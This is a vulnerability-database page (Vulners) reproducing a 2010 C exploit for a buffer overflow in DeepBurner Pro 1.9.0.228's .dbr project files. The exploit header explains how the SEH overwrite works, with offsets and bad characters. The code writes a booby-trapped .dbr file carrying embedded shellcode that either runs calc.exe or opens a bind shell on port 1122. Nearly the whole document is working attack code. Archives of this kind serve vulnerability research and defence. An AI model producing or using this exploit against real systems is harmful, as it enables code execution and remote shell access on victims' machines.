Vulners
Lucene search
DeepBurner pro 1.9.0.228 - '.dbr' file Buffer Overflow (Universal)
/* Deepburner pro 1.9.0.228 dbr file buffer overflow exploit(universal)
[~]This is buffer: {[header] 253 bytes + (junk+ next seh + seh addr) + [tail] 957 bytes} dbr/dbi file
[~]Date: 29.01.2010
[~]Dicovery Credits: fl0 fl0w
[~]Exploit Credits : fl0 fl0w
[?]Download latest vuln vs from: http://www.deepburner.com/?r=download
[?]Compilation: deepburner.c.......Win32(cygwin,Devcpp)
[!]How do I exploit this? well overwriting a seh handler ,the offset is at 529 bytes from the beggining
of my buffer, nseh is at seh-4 bytes whitch a overwrite with a jmp instruction ,after I reposition my
payload in memory(seh->pop/pop/ret | nseh->jmp 9 bytes).
[!]Alternative solution, ESI points somewhere's in memory that I control,so theoretically you could do the
following: pop esi
pop edi
retn
call esi
The problem is that ESI address keeps changing ,I tryed to guess a interval ,as it seems the probablity of
guessing a right address is low aldo this vs of the exploit works 100% every time.
Overwrite seh handler address with pop/pop/retn ,retn instr gets EIP to point to next instruction witch is
the address that next seh handler points to witch will be the address that ESI points to resulting in code execution.
[!]When u generate shellcode make sure to avoid these caracters: 0x00 0x3c 0x3e 0x0a 0x0d 0x22 0x2F.
[!] */
#include<stdio.h>
#include<string.h>
void gen_random(char*,const int);
void cpy_eip(char*,int,unsigned int);
unsigned int getFsize(FILE*,char*);
int cpy(char*,char*);
void print(char*);
void buildfile(char*);
void banner();
void shellprint();
#define VER "1.9.0.228"
#define POCNAME "deepburner pro 1.9.0.228 dbr file buffer overflow exploit(universal)"
#define AUTHOR "fl0 fl0w"
#define VULNF "testfile.dbr"
#define IF(x,NULL) if(x==NULL)
#define FOR(i,a,b) for(i=a;i<b;++i)
#define WHILE(z) while(z>0)
#define SEH_OFFSET 276
#define NEXTSEH_OFFSET 272
char dbrheader[]={
0x3C, 0x44, 0x65, 0x65, 0x70, 0x42, 0x75, 0x72, 0x6E, 0x65, 0x72, 0x5F, 0x72, 0x65, 0x63, 0x6F,
0x72, 0x64, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x2E, 0x38, 0x2E, 0x30, 0x2E, 0x32, 0x32,
0x34, 0x22, 0x20, 0x74, 0x79, 0x70, 0x65, 0x3D, 0x22, 0x64, 0x61, 0x74, 0x61, 0x22, 0x3E, 0x2E,
0x2E, 0x2E, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x64, 0x61, 0x74, 0x61, 0x5F, 0x63, 0x64, 0x20,
0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x64, 0x65, 0x76, 0x69, 0x63, 0x65, 0x3D, 0x22,
0x22, 0x20, 0x73, 0x65, 0x73, 0x73, 0x69, 0x6F, 0x6E, 0x32, 0x69, 0x6D, 0x70, 0x6F, 0x72, 0x74,
0x3D, 0x22, 0x30, 0x22, 0x20, 0x66, 0x69, 0x6E, 0x61, 0x6C, 0x69, 0x7A, 0x65, 0x5F, 0x64, 0x69,
0x73, 0x63, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66, 0x69, 0x6E, 0x61, 0x6C, 0x69, 0x7A, 0x65, 0x5F,
0x74, 0x72, 0x61, 0x63, 0x6B, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x62, 0x6F, 0x6F, 0x74, 0x61, 0x62,
0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x62, 0x6F, 0x6F, 0x74, 0x5F, 0x69, 0x6D, 0x61, 0x67,
0x65, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x3E, 0x2E, 0x2E, 0x2E, 0x2E, 0x20, 0x20,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x64, 0x69, 0x72, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x43, 0x44, 0x52, 0x6F, 0x6F, 0x74, 0x22, 0x20, 0x69, 0x6D, 0x70, 0x3D, 0x22, 0x30, 0x22,
0x3E, 0x2E, 0x2E, 0x2E, 0x2E, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x3C, 0x66, 0x69, 0x6C, 0x65, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x74, 0x65, 0x73,
0x74, 0x2E, 0x74, 0x78, 0x74, 0x22, 0x20, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22,
};
char dbrtail[]={0x22, 0x20, 0x69, 0x6D, 0x70, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x64, 0x69, 0x72, 0x3E, 0x0D, 0x0D,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x64, 0x61, 0x74, 0x61, 0x5F, 0x63, 0x64, 0x3E,
0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x63, 0x64, 0x5F, 0x6C, 0x61, 0x62, 0x65,
0x6C, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x7A, 0x6F, 0x6F, 0x6D, 0x3D, 0x22,
0x30, 0x22, 0x20, 0x76, 0x69, 0x65, 0x77, 0x3D, 0x22, 0x6C, 0x61, 0x62, 0x65, 0x6C, 0x22, 0x20,
0x6C, 0x61, 0x79, 0x6F, 0x75, 0x74, 0x3D, 0x22, 0x73, 0x74, 0x61, 0x6E, 0x64, 0x61, 0x72, 0x74,
0x22, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x6C,
0x61, 0x62, 0x65, 0x6C, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20,
0x20, 0x20, 0x20, 0x3C, 0x66, 0x72, 0x6F, 0x6E, 0x74, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x62, 0x61, 0x63, 0x6B, 0x20, 0x2F, 0x3E,
0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x63, 0x64, 0x5F, 0x6C, 0x61, 0x62,
0x65, 0x6C, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x61, 0x75, 0x74, 0x6F,
0x72, 0x75, 0x6E, 0x20, 0x76, 0x65, 0x72, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x75, 0x73, 0x65, 0x3D,
0x22, 0x30, 0x22, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20,
0x3C, 0x6D, 0x61, 0x69, 0x6E, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x4D, 0x61, 0x69, 0x6E,
0x46, 0x6F, 0x72, 0x6D, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x5F, 0x70, 0x61, 0x74, 0x68,
0x3D, 0x22, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D,
0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x74, 0x69, 0x74, 0x6C, 0x65,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x22, 0x20, 0x74, 0x65,
0x78, 0x74, 0x3D, 0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D,
0x22, 0x54, 0x69, 0x74, 0x6C, 0x65, 0x20, 0x62, 0x6F, 0x78, 0x22, 0x20, 0x6C, 0x65, 0x66, 0x74,
0x3D, 0x22, 0x31, 0x34, 0x34, 0x22, 0x20, 0x74, 0x6F, 0x70, 0x3D, 0x22, 0x34, 0x38, 0x22, 0x20,
0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x35, 0x37, 0x22, 0x20, 0x68, 0x65, 0x69, 0x67, 0x68,
0x74, 0x3D, 0x22, 0x33, 0x33, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D,
0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77, 0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E,
0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65, 0x3D, 0x22, 0x32, 0x30, 0x22, 0x20,
0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D, 0x22, 0x32, 0x35, 0x35, 0x22, 0x20,
0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74,
0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x63, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74,
0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x73, 0x22,
0x20, 0x74, 0x65, 0x78, 0x74, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x22, 0x20,
0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x43, 0x6F, 0x6D, 0x6D, 0x65, 0x6E, 0x74, 0x20, 0x62, 0x6F,
0x78, 0x22, 0x20, 0x6C, 0x65, 0x66, 0x74, 0x3D, 0x22, 0x34, 0x30, 0x22, 0x20, 0x74, 0x6F, 0x70,
0x3D, 0x22, 0x37, 0x36, 0x22, 0x20, 0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x38, 0x39, 0x22,
0x20, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x3D, 0x22, 0x32, 0x39, 0x22, 0x20, 0x66, 0x6F, 0x6E,
0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x54, 0x69, 0x6D, 0x65, 0x73, 0x20, 0x4E, 0x65, 0x77,
0x20, 0x52, 0x6F, 0x6D, 0x61, 0x6E, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65,
0x3D, 0x22, 0x31, 0x35, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D,
0x22, 0x32, 0x35, 0x35, 0x22, 0x20, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31,
0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20,
0x2F, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x65,
0x78, 0x69, 0x74, 0x62, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x20, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22,
0x42, 0x75, 0x74, 0x74, 0x6F, 0x6E, 0x45, 0x78, 0x69, 0x74, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67,
0x65, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x20, 0x69, 0x6D, 0x61, 0x67, 0x65, 0x5F,
0x64, 0x6F, 0x77, 0x6E, 0x5F, 0x70, 0x61, 0x74, 0x68, 0x3D, 0x22, 0x22, 0x20, 0x74, 0x65, 0x78,
0x74, 0x3D, 0x22, 0x45, 0x78, 0x69, 0x74, 0x22, 0x20, 0x68, 0x69, 0x6E, 0x74, 0x3D, 0x22, 0x45,
0x78, 0x69, 0x74, 0x20, 0x74, 0x68, 0x69, 0x73, 0x20, 0x70, 0x72, 0x6F, 0x67, 0x72, 0x61, 0x6D,
0x22, 0x20, 0x6C, 0x65, 0x66, 0x74, 0x3D, 0x22, 0x31, 0x32, 0x30, 0x22, 0x20, 0x74, 0x6F, 0x70,
0x3D, 0x22, 0x39, 0x36, 0x22, 0x20, 0x77, 0x69, 0x64, 0x74, 0x68, 0x3D, 0x22, 0x37, 0x35, 0x22,
0x20, 0x68, 0x65, 0x69, 0x67, 0x68, 0x74, 0x3D, 0x22, 0x32, 0x35, 0x22, 0x20, 0x66, 0x6F, 0x6E,
0x74, 0x6E, 0x61, 0x6D, 0x65, 0x3D, 0x22, 0x4D, 0x53, 0x20, 0x53, 0x61, 0x6E, 0x73, 0x20, 0x53,
0x65, 0x72, 0x69, 0x66, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x73, 0x69, 0x7A, 0x65, 0x3D, 0x22,
0x38, 0x22, 0x20, 0x66, 0x6F, 0x6E, 0x74, 0x63, 0x6F, 0x6C, 0x6F, 0x72, 0x3D, 0x22, 0x32, 0x35,
0x35, 0x22, 0x20, 0x76, 0x69, 0x73, 0x69, 0x62, 0x6C, 0x65, 0x3D, 0x22, 0x31, 0x22, 0x20, 0x66,
0x6F, 0x6E, 0x74, 0x73, 0x74, 0x79, 0x6C, 0x65, 0x3D, 0x22, 0x30, 0x22, 0x20, 0x2F, 0x3E, 0x0D,
0x0D, 0x0D, 0x0A, 0x20, 0x20, 0x20, 0x20, 0x3C, 0x2F, 0x61, 0x75, 0x74, 0x6F, 0x72, 0x75, 0x6E,
0x3E, 0x0D, 0x0D, 0x0D, 0x0A, 0x3C, 0x2F, 0x44, 0x65, 0x65, 0x70, 0x42, 0x75, 0x72, 0x6E, 0x65,
0x72, 0x5F, 0x72, 0x65, 0x63, 0x6F, 0x72, 0x64, 0x3E, 0x0D, 0x0D, 0x0D, 0x0A,
};
struct {
char* shellNAME;
int size;
char* shellTYPE;
}scode[]={ {"Execute calc.exe",164,
"\x29\xc9\x83\xe9\xdd\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x08" //164 bytes
"\x6b\x48\x82\x83\xeb\xfc\xe2\xf4\xf4\x83\x0c\x82\x08\x6b\xc3\xc7"
"\x34\xe0\x34\x87\x70\x6a\xa7\x09\x47\x73\xc3\xdd\x28\x6a\xa3\xcb"
"\x83\x5f\xc3\x83\xe6\x5a\x88\x1b\xa4\xef\x88\xf6\x0f\xaa\x82\x8f"
"\x09\xa9\xa3\x76\x33\x3f\x6c\x86\x7d\x8e\xc3\xdd\x2c\x6a\xa3\xe4"
"\x83\x67\x03\x09\x57\x77\x49\x69\x83\x77\xc3\x83\xe3\xe2\x14\xa6"
"\x0c\xa8\x79\x42\x6c\xe0\x08\xb2\x8d\xab\x30\x8e\x83\x2b\x44\x09"
"\x78\x77\xe5\x09\x60\x63\xa3\x8b\x83\xeb\xf8\x82\x08\x6b\xc3\xea"
"\x34\x34\x79\x74\x68\x3d\xc1\x7a\x8b\xab\x33\xd2\x60\x9b\xc2\x86"
"\x57\x03\xd0\x7c\x82\x65\x1f\x7d\xef\x08\x29\xee\x6b\x45\x2d\xfa"
"\x6d\x6b\x48\x82"
},
{ "bind shell on port 1122",709,
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e"
"\x4d\x54\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x46\x4b\x48"
"\x4e\x36\x46\x52\x46\x32\x4b\x38\x45\x54\x4e\x53\x4b\x38\x4e\x37"
"\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"
"\x4f\x35\x42\x52\x41\x30\x4b\x4e\x49\x34\x4b\x38\x46\x43\x4b\x48"
"\x41\x30\x50\x4e\x41\x33\x42\x4c\x49\x49\x4e\x4a\x46\x58\x42\x4c"
"\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x33\x46\x45\x46\x32\x4a\x32\x45\x37\x45\x4e\x4b\x48"
"\x4f\x55\x46\x32\x41\x50\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x44"
"\x4b\x58\x4f\x45\x4e\x31\x41\x30\x4b\x4e\x43\x30\x4e\x32\x4b\x58"
"\x49\x38\x4e\x36\x46\x52\x4e\x41\x41\x56\x43\x4c\x41\x33\x4b\x4d"
"\x46\x56\x4b\x38\x43\x34\x42\x53\x4b\x38\x42\x44\x4e\x30\x4b\x48"
"\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x34\x4a\x30\x50\x45\x4a\x46"
"\x50\x38\x50\x44\x50\x30\x4e\x4e\x42\x55\x4f\x4f\x48\x4d\x48\x56"
"\x43\x55\x48\x36\x4a\x36\x43\x33\x44\x33\x4a\x46\x47\x57\x43\x57"
"\x44\x43\x4f\x45\x46\x35\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e"
"\x4e\x4f\x4b\x43\x42\x45\x4f\x4f\x48\x4d\x4f\x55\x49\x58\x45\x4e"
"\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x50\x45\x35\x4c\x56\x44\x30"
"\x4f\x4f\x42\x4d\x4a\x36\x49\x4d\x49\x50\x45\x4f\x4d\x4a\x47\x55"
"\x4f\x4f\x48\x4d\x43\x55\x43\x45\x43\x45\x43\x35\x43\x35\x43\x44"
"\x43\x35\x43\x34\x43\x45\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x46\x50"
"\x44\x36\x48\x36\x43\x35\x49\x38\x41\x4e\x45\x49\x4a\x36\x46\x4a"
"\x4c\x51\x42\x47\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x31"
"\x41\x55\x45\x35\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x42"
"\x49\x4e\x47\x45\x4f\x4f\x48\x4d\x43\x55\x45\x45\x4f\x4f\x42\x4d"
"\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x54\x47\x55\x4f\x4f\x48\x4d"
"\x42\x55\x46\x35\x46\x45\x45\x45\x4f\x4f\x42\x4d\x43\x49\x4a\x46"
"\x47\x4e\x49\x47\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x35"
"\x4f\x4f\x42\x4d\x48\x46\x4c\x46\x46\x46\x48\x36\x4a\x46\x43\x56"
"\x4d\x36\x49\x38\x45\x4e\x4c\x36\x42\x35\x49\x45\x49\x32\x4e\x4c"
"\x49\x38\x47\x4e\x4c\x56\x46\x34\x49\x58\x44\x4e\x41\x43\x42\x4c"
"\x43\x4f\x4c\x4a\x50\x4f\x44\x44\x4d\x52\x50\x4f\x44\x54\x4e\x52"
"\x43\x39\x4d\x58\x4c\x57\x4a\x53\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56"
"\x44\x57\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f"
"\x48\x4d\x4b\x45\x47\x55\x44\x45\x41\x45\x41\x35\x41\x45\x4c\x56"
"\x41\x50\x41\x45\x41\x55\x45\x55\x41\x55\x4f\x4f\x42\x4d\x4a\x36"
"\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x45\x4f\x4f\x48\x4d\x4c\x36"
"\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x58\x47\x35\x4e\x4f"
"\x43\x58\x46\x4c\x46\x36\x4f\x4f\x48\x4d\x44\x55\x4f\x4f\x42\x4d"
"\x4a\x56\x42\x4f\x4c\x38\x46\x30\x4f\x35\x43\x35\x4f\x4f\x48\x4d"
"\x4f\x4f\x42\x4d\x5a"},
{NULL,NULL}
};
int j;
int main(){
banner();
shellprint();
buildfile(VULNF);
print("Done!");
//sleep()
getchar();
return 0;
}
void buildfile(char* fname){
char seh[]="\xAF\x20\x36\x02";
char nseh[]="\xeb\x09\x90\x90";
scanf("%d",&j);
char buffer[1000000];
gen_random(buffer,999999);
memcpy(buffer+SEH_OFFSET,seh,4);
memcpy(buffer+NEXTSEH_OFFSET,nseh,4);
memset(buffer+SEH_OFFSET+4,0x90,10);
switch(j){
case 0:
memcpy(buffer+SEH_OFFSET+14,scode[0].shellTYPE,strlen(scode[0].shellTYPE));
break;
case 1:
memcpy(buffer+SEH_OFFSET+14,scode[1].shellTYPE,strlen(scode[1].shellTYPE));
break;
default: print("Error with shellcode");exit(0);
}
FILE* f=fopen(fname,"wb");
IF(f,NULL){ print("error writing file");exit(0);}
fprintf(f,"%s%s%s",dbrheader,buffer,dbrtail);
fclose(f);
free(dbrheader);
free(dbrtail);
free(buffer);
printf("[!]File is:%d bytes\n",getFsize(f,VULNF));
}
void banner(){
printf("[$]%s\n[$]Vs %s\n[$]%s\n",POCNAME,VER,AUTHOR);
}
void shellprint(){
int i;
print("Chose you shellcode(press 0 || 1)");
for(i=0;i<2;i++)
printf("[~]%s of %d length %d\n",scode[i].shellNAME,scode[i].size,i);
}
void gen_random(char *s, const int len)
{ int i; //helps u find the offsets
static const char alphanum[] ="0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
FOR(i,0,len)
{
s[i]=alphanum[rand()%(sizeof(alphanum)-1)];
}
s[len]=0;
}
unsigned int getFsize(FILE* g,char* gname)
{
unsigned int s;
g=fopen(gname,"rb");
IF(g,NULL)
{
print("File error at reading");
exit(0);
}
fseek(g,0,SEEK_END);
s=ftell(g);
return s;
}
int cpy(char* source,char* dest)
{
int len;
len=strlen(source);
memcpy(dest,&source,len+1);
return len;
}
void print(char* msg)
{
printf("[*]%s\n",msg);
} Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
02 Feb 2010 00:00Current
7.4High risk
Vulners AI Score7.4